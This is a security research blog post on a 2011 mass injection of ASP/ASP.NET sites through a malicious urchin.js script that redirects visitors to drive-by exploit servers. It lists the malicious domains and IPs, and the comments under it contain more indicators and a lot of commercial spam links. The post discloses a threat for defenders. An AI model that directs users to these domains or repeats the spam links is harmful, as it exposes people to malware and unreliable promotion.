http://jjghui.com/urchin.js mass infection ongoing

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Starting Oct 9th, we've been tracing an mass injection attempt. Currently, there's been 180,000 affected pages, according to Google.


The attack targets visitors of six particular languages--English, German, French, Italian, Polish, and Breton, seen from the following deobfuscated script:



Here is a text version of the above decoded script.

The scripts causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser.

In a drive-by download attack, visitors who navigate to the infected websites will be installed with malware on their machines without their knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).

This wave of mass injection incident is targeting ASP ASP.NET websites.

Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.


jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.

[Details]

1. ASP and ASP.NET websites are injected with the following script (text is here):


2. Contents of urchin.js is as seen below; full text is here.


3. The above script decodes to the following:

Here is a text version of the above decoded script.

4. The above script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.

39 comments:

Jason D.Seimesi said...

Here are some other domains to add to the list:75.102.21.121 www3.bestyud-master.rr.nu75.102.21.121 www3.simplellantivir.rr.nu75.102.21.121 www3.thebest-peguard.rr.nu75.102.21.121 www3.strongdefenseiz.in75.102.21.121 www3.strongdefenseiz.in75.102.21.121 www3.strongazsuite.inRegards,

Wayne Huang said...

Thank you Jason!

Asasfasff Asfasf said...

virustotal link doesnt work

Wayne Huang said...

fixed http://www.virustotal.com/file-scan/report.html?id=1ba709f9c643260b82419c61ab7c21b428226a97642e575f4066a4847c3877aa-1318447706

joe said...

It'd be interesting to know what file would have been executed on victim's machine, you didn't show that!

joe said...

Or if scandsk.exe was the only file executed you could have posted it here.

03storic said...

They are also using http://nbnjki.com/urchin.js now

Anonymous said...

Does anyone know what the initial SQL Injection attack vector was? 

Anonymous said...

so it's not a SQL Injection attack? the NetworkWorld article that brought me here indicated a mass SQL Injection attack?

http://www.networkworld.com/news/2011/101911-sql-injection-attack-252188.html

How to register a website said...

Great!  Well, I admire the precious time and effort you put into it, especially into interesting articles you share here! It was very useful.. 

inidaho said...

would love to see what the attack vector in logs looked like too.

Leonardo said...

It should be possibile that the script send all xml located in %appdata%/Filezilla to remote server ?
Anyone have try to track what kind of command the script execute in some virtual machine ?

mo3s said...

I have an asp.net site. code is clear. I put it online. this bastard appears. it is not db, right? I should ask my hosting provider since it is not with me? In other words...who do i blow to get this removed

VCfunding said...

I am really inspired together with your writing abilities as smartly as with the structure for your weblog. 
Keep up the excellent quality writing, it's uncommon to see a nice blog like this one nowadays.

MathstutorPune said...

I must say that overall I am really impressed with this blog.

Joomla Development said...

I'm
happy when reading through your site with up-to-date information!
thanks alot and hope that you'll publish more site that are based on
this website.

joomla developers said...

Thanks for the code guys. Great Work!

richard said...

I found your site about 2 weeks ago when I was struggling to get rid of a virus. I have a learned a lot! (though some of it is over my head) I got a lot of great help here, and at this website: http://myvirusremoval.com/

Simran said...

Thanks for providing this knowledgeable information, i think most of the peoples are get benefits from your blog.SIMRAN

restorationsos said...

water removal http://www.restorationsos.com The Most Helpful Restoration Service in America - Affordable Services in Your Area - 24/7 Hotline.

mendocino luxury hotels said...

Very impressive exposed!  I've been tracing an mass injection attempt. Currently, there's been 180,000 affected pages, according to Google.

trading computersnow said...

really your blog is very nice . thanks for sharing information .  Trading Computer

Domain Registration said...

Nice blog. I will keep visiting this blog very often.

Best Website Hosting said...

Your demo with the explanation is too useful. Thanks.

web designing company said...

Thanks for the above mentioned codes  ..really so interesting.

Darren said...

Yeah me as well. Would be interesting to find out
http://speed-up-pc.org

glyco flex said...

Stopping by your blog helped me to get what I was looking for. I found your site in yahoo.

ecommerce development said...

That is so true.This is very useful article.Thanks for sharing.

water damage said...

just had webmaster tools hit me with a similar warning...thanks for the info.

ecommerce development said...

This is awesome post.I found this to be very informative.Thanks for sharing.

Domain Registration said...

 Excellent information.. which I believe will be very useful for me.

ecommerce development said...

This is an awesome post.

Just helped me along my program.
I found this article to be very valuable.Thanks for sharing.

seo house said...

This site seems to receive a great deal of visitors. How do you promote it? It gives a nice individual twist on things. I guess having something authentic or substantial to give info on is the most important facto
http://www.nike-free-sko.org

seo house said...

Yes, I agree with you, welcome to visit this

http://www.nike-free-sko.org

medical student guide said...

Real
Shoppee is truly one of a kind, distinctive virtual sales business.
Realshoppee is a customer focused, leading Virtual Shop with product range
covering Pearl Jewellery, Other Fashion Goods & Services.
cheaponlineshoppingguide.com

medical student guide said...

Satisfied
Shopping After Reading Baume & Mercier Products Review

christmasresortpackages.com

medical student guide said...

If you
and your partner live in any of the states that recognize common law
marriages and do not want the state to consider you as married,

commonlawrights.eu

medical student guide said...

Where to
find authentic designer products such as MAC Cosmetics and Victoria's Secret,
as well.. as Designer Handbags like Coach, Guess, Nine West, Kenneth Cole,
and more. Also includes fashion.. news and makeup tips.

justshoppingcenter.com

medical student guide said...

Had Cameron been
forced to pull the veto this time around, it would have been a completely
different matter.

financialadvisertips.com

Post a Comment